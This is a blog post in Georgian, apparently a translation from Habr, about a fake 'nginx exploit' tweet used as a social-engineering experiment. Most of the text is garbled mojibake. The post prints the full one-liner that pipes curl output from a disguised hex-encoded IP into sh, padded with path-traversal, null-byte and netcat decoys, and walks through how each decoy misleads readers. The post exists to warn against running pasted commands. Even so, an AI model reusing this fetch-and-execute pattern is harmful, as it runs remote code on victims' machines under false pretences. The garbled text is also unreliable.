แฒจแแแแจแแแ. แแแ แแแแ:
TL;DR: แแ แแแแแแ แจแแแแฎแแแแแจแ แแ แแแแแแงแแแแ แคแแแแแแแก แแแฌแแแแแ sh แแ bash-แจแ. แแก แจแแกแแแแจแแแแ แแแแ แแแแแแฃแขแแ แแ แแแแขแ แแแแก แแแกแแแแ แแแแแ.
แแแแแ แแแแแแแแ แแ แแแแแ แแกแขแแ แแ แแแแแแฃแ แ PoC แแฅแกแแแแแขแแก แจแแกแแฎแแ, แ แแแแแแช แจแแแฅแแแ 31 แแแแกแก. แแก แแงแแกแแแ แแ แแแแแฉแแแ แแฎแแแ แแแแแแแก แกแแแแกแฃแฎแแ
แ แแแแกแแช แแแแแกแ แฃแแ แแฃแจแแแแ แแแแแแแแแแก แแฎแแ แขแแฅแแแแแแ curl-แจแ, แแ แแแแแงแแแแ แแ แแแแแแแฃแ แ แขแแแขแ แแ โแแแแแแ แกแแแฃแจแแ PoCโ, แ แแแแแแช แจแแแแแแ แแแแแก แแ แแ แฎแแแแกแแแ, แ แแแแแแช แกแแแแ แแฃแแแ แแงแแแแแก แแฆแแแฉแแแแ แแแฃแชแแแแแแแก. แ แ แแฅแแ แฃแแแ, แแก แกแ แฃแแ แกแแกแฃแแแแ แแงแ. แแแแ แแฃแแแแแ, แ แแ แแแจแแแแ แแแแแฆแแแแแแแแแ แแ แกแแฃแแแแแกแ แจแแแแฎแแแแแจแ, แ แแแแแแแแ แ แแขแแแขแก แแแแแฆแแแแ (แแฐ แแแ แแ).
แแฃแแชแ, แแแ แฌแแ แแแแแแแแแแ, แ แ แแแฎแแ แจแแแแแ. แฉแแแ แขแแแขแแก แแแแฃแแแ แแแ แแแแแแ แแ. แแแกแแแแแ แแ, แ แแ แแ แแแแแแขแจแ (15:00 แแแกแแแแแก แแ แแแ 1 แแแแแกแ) แ แแแแแแแแ แแแแแแแแแ แแแแชแแแแแแ แ, แ แแ แแก แงแแแแแ. แแแแ แ แแแแแแแแ แแแก แแแแแขแแแ แแแแก แงแแแแแแแแ แ แจแแแแฌแแแแแก แแแ แแจแ (แ แแ แแฆแแ แแคแแ แ แแแฅแแแ แแฆแคแ แแแแแแแแฃแแ แแแ แแแกแ แแจแแแแแแ แ ASCII แแ แแคแแแแ).
แฃแแ แแแแ แแแฎแแ แ แ แแแแแแแ!
แแแฃแฎแแแแแแ แแแแกแ, แ แแ แงแแแแ แแก แแแ แงแฃแแ แแ แคแแ แ แจแแกแแแแจแแแแแ, แชแฎแแแแ, แ แแ แแแแแแแแแแก แฃแแแ แแแแขแแ แแแแแแ แแแแ แแแ แแแแ แแขแแ, แ แแ แแแแแแฎแแ แแกแแแ. แกแแแแแแแแ แแ, แแ แแฃแแแ แแแแช แแแแแแแแแ แแ แแฃแจแแแแแ แแ แแ แคแแฅแขแแแ แแ แแแ, แ แแ แแ แแแแแแแแแ แแ แแแแแแแ แแฃแ แแแแฃแแ แแ แแแแแแแแแก แจแแฆแฌแแแ, แฉแแแก แกแแแขแแ แฉแแคแแฃแแ แแแแ แแฎแแแแ แแฅแ แแแ แแแก แแแแแแแแ แแแแแขแแแแแ แแแแแก แแแงแแแแแแก แแ แจแแกแ แฃแแแแแก แแชแแแแแแแก แแแ แแจแ.
แแชแแ แ แแแแแฎแ แแแ:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
แกแแชแแแแฃแ -แแแแฅแขแ แแแฃแแ แแแแแแแ แแ (SEE) - แแแขแ, แแแแ แ แฃแแ แแแแ แคแแจแแแแ
แฃแกแแคแ แแฎแแแแ แแ แแแชแแแแ แแงแ แแ แแฅแกแแแ แแแแแขแแก แแแแแแ แ แแแฌแแแ. แแคแแฅแ แแ, แกแฌแแ แแ แแแแ แแแแแแแ แแแ แแแกแ แฌแแ แแแขแแแ. แแ แซแแแแแแก แฎแแแ แแจแแแ แแ แแฃแแแกแฎแแแแแ แฃแกแแคแ แแฎแแแแแก "127.0.0.1" (แชแแแแแแ แแแแแแฐแแกแขแ) แแแแแแแแแ. Localhost แแแแแแแ แฃแกแแคแ แแฎแแ แแ แแแกแแ แแ แกแแแฃแแ แแแแแชแแแแแ แแ แแกแแแแก แขแแแแแก แแฅแแแแก แแแแแแฃแขแแ แก.
แแแชแแแแแแ แแงแ แแฅแกแแแ แแแแแขแแก แแแแ แ แซแแ แแแแแ SEE แแแแแแแแแขแ. แแแแแแแแ แกแแแแแแ แแฃแแแขแแ แแ แซแแ แแแแแแ แจแแแแแแแแ แแแแแแฃแขแแ แแก แฃแกแแคแ แแฎแแแแแก แกแแคแฃแซแแแแแแก แแชแแแแ แแแแแแแแแแแกแแแ, แแแแจแแแแแแแแแ แแงแ แแแแแก แจแแฅแแแ แแกแ, แ แแ แแแกแ แแแฌแแแแแ แแแชแแแแ แแ แแแชแแแแ แฉแแแแแก (แแ แจแแกแแแแแแกแแ แฃแกแแคแ แแฎแ). แซแแแแ แแฅแกแแแแแขแแก แชแแแแแแแก แแแแแแแขแแแแก แกแแกแฎแแแ แแ แแแแ แฃแฉแแแฃแแ แแแแ แแแแ แแแแแแแ แซแแแแแ แฌแแ แแแขแแแฃแแ แแฆแแแฉแแแ.
แฅแแแแแ แแแชแแแฃแแแ แแ แแ แแแแแแ แแก แแแขแแแฃแ แ แแแแแแแ. แแ แกแแแจแ แงแแแแแคแแ แ แแชแแแ แแแกแแแขแแแฃแ แ แแฃแแแแแแ แแ แแฅแขแแแฃแแแ แแ แแคแแ แแ แกแแญแแ แ แแแกแ แคแแฅแขแแแ แแแ แแฃแจแแแแแกแแแแก.
แ แ แแแแแแแแแขแแแแ แแแแแแแแแ แกแแญแแ แ? แแก -gsS
, -O 0x0238f06a
, |sh
แแ แแแแแ แแแ แกแแ แแแ แ. แแแ แกแแ แแแ แ แแ แจแแแชแแแแ แ แแแแ แแแแแ แแแกแขแ แฃแฅแชแแแก, แแแแ แแ แฃแแ แแแแ แแแกแแฎแฃแ แแแแแ ASCII แแ แแคแแแแก แแ แซแแแแแแแแก แแแแแงแแแแแแ echo
แกแแ แแแขแจแ, แ แแแแแแช แจแแแชแแแก index.html
. แ แแแแกแแช แแแแฎแแแ แแแแแ แจแแแแแ แฎแแแจแ |sh
แจแฃแแจแ, index.html
แแแขแแแ แแฃแแ แแ แจแแกแ แฃแแแแฃแแ. แกแแแแแแแแ แแ, แแแ แกแแ แแแ แแก แแแฃแ แแแแแก แชแฃแแ แแแแแ แแฎแแ แแ แฐแฅแแแแแ.
-
../../../%00
โ แฌแแ แแแแแแแแก แแแ แแฅแขแแ แแแก แแแฆแแ แแแกแแแแก; -
ngx_stream_module.so
โ แแแ แจแแแแฎแแแแแแ NGINX แแแแฃแแแกแแแ; -
/bin/sh%00<'protocol:TCP'
- แแแแแ แแแฌแงแแแ/bin/sh
แกแแแแแแ แแแแฅแแแแแ แแ แแแแแแแกแแแแ แแแแ แแแแแแแแแแ TCP แแ แฎแแ; -
-O 0x0238f06a#PLToffset
- แกแแแแฃแแแ แแแแ แแแแแแขแ, แแแแแขแแแฃแแ#PLToffset
, แแแแแแงแฃแ แแแแแแก แแแฎแกแแแ แแแแก แแคแกแแขแแ, แ แแแแแแช แแแ แแแแฃแแฌแแแแ แจแแแชแแแก PLT-แจแ; -
|sh;
- แแแแแ แแ แแ แแแแจแแแแแแแแแ แคแ แแแแแแขแ. แฉแแแ แแแแแญแแ แแ แแแแแแแแแแ แแแแแแแกแแแแ แแแแ sh/bash-แแ, แ แแแ แจแแแแแกแ แฃแแแแแแ แแแแ, แ แแแแแแช แแแแแก แแแแแแแกแฎแแแแ แแแ แกแแ แแแ แแแแ, แ แแแแแแช แแแแแแ แแแแก แแแกแแแแ แแแ:0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- แแแขแงแฃแแแ, แ แแแแแจแแช netcat แแฎแแแ/dev/tcp/localhost
แ แแแ แงแแแแแคแแ แ แแกแแ แฃแกแแคแ แแฎแแ แแแแแแงแฃแ แแแแแแก. แคแแฅแขแแแ แแแแ, แแก แแ แแคแแ แก แแแแแแแก แแ แจแแแแก แกแแแแแแแแก แฎแแแจแ.
แแแแ แแแกแ แฃแแแ แแ แแกแขแ แแฅแแแแแแ แกแแ แแแขแแก แแแจแแคแแ แ แแ โแกแแชแแแแฃแ -แแแแฅแขแ แแแฃแแ แแแแแแแ แแแกโ (แ แแฃแแ แคแแจแแแแแก) แแกแแแฅแขแแแแก แแแแฎแแแแ.
แแแ แกแแ แแแ แแก แแแแคแแแฃแ แแชแแ แแ แแแแขแ แแแแแแ
แแแแก แแแแ, แ แแ แฉแแแ แแแแแแแขแแแแก แแแแ แฃแแ แแแแแกแแแ แแ แแก infosec/แฐแแแแ แแแ, แแแแแแฌแงแแแขแ แแแแฎแแแ แแแ แกแแ แแแ แ แชแแขแ แฃแคแ แ แแแแ แแแ แแแแ แแฎแ แแแแ โแแแขแแ แแกแแกโ แแแแแแแแแแก แแแแแ แ, แแฎแแแแ แแแแขแแ, แ แแ แแแญแแแก แ แแแแ แฐแฅแแแแแ แแแกแแแแแแแแแ (แแ แกแแฎแแแแกแ แแฅแแแแแแ แแฌแงแแแ). แแ แแ แแแแแ แแ แแฅ แฉแแแแแแแแแ แงแแแแ แฎแแ แแแแ, แ แแแแแ แแฅแกแแแ แแแแแขแ แฏแแ แแแแแ แแ แซแแแแแแ, แแแแ แแ แแฅ แแ แแก แ แแแแแแแแ แ แแ, แ แแกแแช แกแแ แแแ แ แแแแแแแก:
- แแฅแขแแฃแ แแ แแแแแขแ แแแแแก แแแแแฌแแแแแแก แแชแแแแแแแแก แแแ แแแแฃแ แกแแชแแแแฃแ แฅแกแแแแแจแ แแ แชแแแแก แกแฎแแแแแกแฎแแ แแแแแฎแแแแแก แแกแแแแแแก, แ แแแ แฌแแแฎแแแแกแแก แแแแฎแแแ แแแแแ แแแแฌแแแแฃแแแก แแแฃแแแ.
- แแแแแแแกแแแแ แแแแก Chrome/Mozilla/Safari/ แแ แ.แจ. Thugcrowd-แแก แกแแ แแแแแแ แแแแแแแ แแแ แกแแก แกแแ แแแขแแก แฉแแแแแแแก แแแชแแแแ.
- แฃแงแฃแ แแแก แจแแญแ แแก/แฃแฎแแจแ แฐแแแแ แแแแก แแจแแแ แ แแแจแแแแก แแ แจแแแแแ แแฌแงแแแก แแแแฎแแแแแแแก แแแแแแแกแแแแ แแแแแก NSA แกแแ แแแ แแแแ (แฐแ!).
- แแแแกแขแแแแ แแแก แขแ แแแก, แแกแแแ แ แแแแ แช BIOS rootkit-แก แงแแแแ แแแแแแฃแขแแ แแ, แ แแแแแก แแแแฎแแแ แแแแแแแช แกแขแฃแแ แแแแ แแแกแแแแซแแแก แฉแแแฃแแแแ แแแ แแ แแฃแแแ แแแแ (แฃแแ แแแแ แฎแฃแแ แแแ!).
แแแขแแแแ แแแแก แแชแแ แ แแแฌแแแ
แแ แจแแแแฎแแแแแจแ, แฉแแแ แแ แแแแแ แแ แแแแแแ แแงแ Apache-แก แแแแแแ แแ แแแฎแแกแแแแแแแแก แแแฃแคแแแแ - แแแ แซแแ, แแแแฎแแแแแแแก แแแแแแแกแแแแ แแแแแก แแแแแ แ แฌแแกแแแ - แแ แแคแแฅแ แแแแ: แ แแขแแแแช แแ แ?
NGINX แแฅแกแแแแแขแ (แ แแแแฃแ แ!)
แแแแแฌแแ แ
แฌแงแแ แ: www.habr.com